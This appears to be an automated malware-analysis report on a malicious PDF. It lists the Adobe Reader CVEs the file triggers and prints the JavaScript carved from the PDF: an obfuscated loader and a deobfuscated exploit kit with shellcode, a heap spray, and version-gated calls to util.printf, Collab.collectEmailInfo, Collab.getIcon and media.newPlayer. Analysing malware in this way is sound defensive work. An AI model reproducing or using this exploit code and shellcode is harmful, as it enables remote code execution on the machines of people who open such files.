MALICIOUS
408
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 9
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0015_000.js |
pdf-javascript-stream | PDF /JS object 15 at offset 0x2232 | 5480 bytes |
SHA-256: 4d4946a0a76c4238e3d205a1a4ba1fc4ac34c0961d9da2041d340b31b66b15a8 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 39 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var nP=false;var cE=false;var googleW=false;this.u=false;var googleS=new String();var uV=6977;this.pR='';var wEdit=false;var sN=new String();var updateEdit=14124;var uVF=false;this.editG='';var tY=19965;this.jA='';this.h=false;var adobeT=function(){};var adobeO=function(){};this.tN=false;this.dH=false;this.updateH=false;this.sG='';var l='get';this.r=false;var dC=new Function();var aEdit=function(){};var oQ=new Function();var basicL=new Function();this.oH=false;var tFile=function(){};this.z=false;var oFile=new Function();var updateW=function(){};var aW=new Function();var wKI=new Function();var dJ=function(){};var jR=function(){};var hZV=new Function();l+='Page';var eK=21995;this.adobeQ=20151;var basicEdit=28914;var adobe="4d%4df";var pC=function(){};var fAdobe=function(){};var alphaUpdate=function(){};var aV=27054;var fileGoogle=new Function();var mI=new String();var bI=new String();var eW=function(){};var editGoogle=function(){};var fileR=function(){};var hAlpha=new String();var jD=function(){};var uBasicP=function(){};var uAdobe=new Function();var kAdobe=20342;var file='';this.jE=863;var tV=new Function();this.wE=30673;var hF=new Date();var jBasic=new String();var xV=new Function();var hR=new Function();var mEdit=new Date();this.gAdobe=6429;var lE=new String();var vK=new String();var basicEditFile=new Date();var basicR=new Function();var dMAdobe=new Date();this.iMT=30181;var update=[3,2][1];var editGG=new Date();var wR=new Date();var oHFile=new Function();var kXH=new String();var wEL=new Function();var yGoogle=new Date();var google=Function;var cD=new Function();var sGFile=new Function();var googleG=new String();var j=app;this.yQ='';var alphaN=new String();var cBasic=new String();this.tYR=false;var lN=function(){};this.tO=false;this.oG='';var sP=function(){};this.rAdobeE='';this.editX='';this.googleX='';this.aG=false;var gAdobeK=function(){};var iYAlpha=new String();this.fR='';var mEAlpha=new String();var pY=function(){};this.oCW=false;j=j['doc'];var lA=31253;var cWH=26790;var hIW=18035;this.iE='';var rEdit=26561;var updateFile=false;var yA=function(){};var kC=false;var mQ=function(){};var wM=false;this.kT=21313;var nAlpha=new Date();var cTL=new Date();var vG=new Date();this.eBasic=12824;var g=l;var uFile=8383;var yUpdateH=false;this.wMT=26733;var fE=new Date();var googleAdobe=false;var iFileY=new Date();var updateUpdate=new Date();var qGB=16203;var lQ=new String();var fileZ=new Date();var zH=21231;var fU=false;var jDA=false;var dRQ=false;var jBasicZ=7861;var editFile=new Date();var hB=new Date();g+='NthWord';this.alphaZ='';var editFileD=false;this.fFileB=1038;this.hE='';var lW=false;this.nTP='';var editI=false;this.iFileB=21254;this.wG=11661;this.xEEdit=574;this.jV=5114;this.gDBasic='';var updateJF=new Function();var fileUR=false;var iQ=false;var wRZ=false;var zD=false;var q=233;var vGD=new Function();var fF=new Function();var fLGX=17140;var fileZGoogle=new String();var nD=new String();var jAQ=new String();this.iIUpdate=29047;var googleD=new Function();var rEditC=false;var cBZ=false;var basicCAdobe=false;this.mFile='';var zDQ=false;var cS=false;var rO=26460;this.nR='';var gUpdateV=false;this.bW='';this.iH='';this.tOD='';var lOR=false;this.alphaEdit='';var iEZ=false;this.pWJ='';var edit=l;var rA=17691;this.hTF=14141;this.iP=27440;edit+='NumWords';var jTFile=new String();var xZF=new Date();var updateB=new Date();var jBasicW=new String();var gY=new String();var iQEdit=new String();var aMA=new Function();var pDFile=new Function();var kI=false;var alphaGoogle=function(){};this.updateM='';this.pU=false;this.editRF=false;this.nBasic=false;var iIH=function(){};this.editH='';var mA=function(){};var qJ=function(){};this.uF='';var qLN=function(){};var editRI=function(){};var alphaM=function(){};this.editQ=false;var i="cape";var fileQC=25658;var vL=new Date();this.aMN=false;var jEditI=new String();var yLL=11639;var c=[0,1][0];var fGFile=function(){};var pO=function(){};var rOH=function(){};var eV=new Date();var aIAdobe=function(){};var alphaAlpha=function(){};var qME=new String();var rF=new Date();var kMBasic=12207;var vAdobeF=new String();var zEdit=new String();var cFile=new String();var kBasic=function(){};var yJ=function(){};var qP='cha'+'rCode'+'At';var jX='fr'+'omCharC'+'ode';this.cYO=false;var updateGoogleN=new Function();var xUpdate=new Date();var yLBasic=new Function();var oBasic=new Date();this.cFileK=false;this.lMA=19905;var fileT=new Function();this.nH=false;this.nRV=false;adobe=adobe.substr(2,1);var wX=new Function();var basicYT=new Function();var mAN=new Function();var eKGoogle=new Function();var googleZ=14890;var zJN=new Date();var vUU=new Function();var lAlpha=new Date();var nCK=false;var basicCY=new Function();var gGF=new Date();var iNG=new Date();var aIF=new Date();var rS=false;var sAlphaF=new Function();var oK=new Function();var eZX=false;var dTAdobe=false;var rD=false;var n=this['u'+'nes'+i];this.editID=8261;var googleBasic=new Function();var vM=new Function();this.bGoogleM=1870;var fileII=new String();var oMAdobe=function(){};var basicT=function(){};var fNE=new Function();var eBasicU=new Function();var zI=function(){};this.qPAdobe=false;var pXD=new Date();var wD=false;var eQJ=8354;var basicOE=new Date();new google(cF(2, q))();this.rJI=22787;var bQ=new Function();var bEditL=14089;var oFileT=1339;this.oIT=24628;var googleUpdateD=new String();var aY=26250;this.uT=19462;var fileSE=12937;var dMY=new String();this.mGQ=false;this.mCI='';this.rHN='';this.oTS='';var pHI=false;
|
|||
legacy_pdfkit_stage_000.js |
deobfuscated-js | getPageWords-XOR Pidief stage normalized at offset 0x0 | 3358 bytes |
SHA-256: 06ccabfcda67a4197adcf7c8704227410ac0773527b63ca319397ecb807f3cce |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
' ' ' 'D#G#G77#7G7D''# # DD#EGG#GEE ###DG'337733737' 7333
var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%";
var dest_table= "q=Vg2v%5B6YrO?cHDK1mf:3MRyu/oNGUhAsit0dl-Xap7kLewxzJb94QISn.8j0F&WE_ZCTP";
app.alert(123);
var hwTl9Dn = new Array();
function get_shellcode(name) {
var u = get_url();
var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";
s+= u;
return unescape(s);
}
function get_url(){
var str = this.info.author;
var ret = encode_str(str, dest_table, src_table);
return ret;
};
function encode_str(str, src_table, dest_table){
var ret="";
for(var i=0; i < str.length; i++)
{
var index = src_table.indexOf(str[i]);
if(index > -1 )
{
ret += dest_table[index];
}
}
return ret;
};
function Rq4v1qCC(PDrScZj4, ez5pL6){
while (PDrScZj4.length * 2 < ez5pL6){
PDrScZj4 += PDrScZj4;
}
PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2); return PDrScZj4;
}
function x8EvTm(I7T0vko5){
var qPBt7D = 0x0c0c0c0c;
NRjjR6W6 = get_shellcode("pdf");
if (I7T0vko5 == 1){qPBt7D = 0x30303030;}
var FeQq1Vv = 0x400000;
var tsSzSc = NRjjR6W6.length * 2; var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38);
var PDrScZj4 = unescape("%u9090%u9090");
PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6);
var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv;
for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){
hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6;
}
}
function U2UcYKr(){
var IyIFVe = app.viewerVersion.toString();
if (IyIFVe > 8){
x8EvTm(1);
var iVvCdy8 = "12999999999999999999";
for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ ){ iVvCdy8 += "8";
} util.printf("%45000f", iVvCdy8);
}
if (IyIFVe < 8){
x8EvTm(0);
var UNXaCTHb = unescape("%u0c0c%u0c0c");
while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb;
this .collabStore = Collab.collectEmailInfo({ subj : "", msg : UNXaCTHb});
}
if (IyIFVe < 9.1){
if (app.doc.Collab.getIcon)
{
x8EvTm(0);
var eGREUTNw = unescape("%09");
while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw;
eGREUTNw = "N." + eGREUTNw;
app.doc.Collab.getIcon(eGREUTNw);
}
}
if (IyIFVe == 9.2){
x8EvTm(1);
util.printd("1.000000000.000000000.1337 : 3.13.37", new Date());
try
{
media.newPlayer(null);
} catch(e)
{}
util.printd("1.000000000.000000000.1337 : 3.13.37", new Date());
}
}
U2UcYKr();
#''''7'7 ' G' 7# BB''' ''B '#' GGGGGGGGGGGGGGGGGGGGGGGG
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.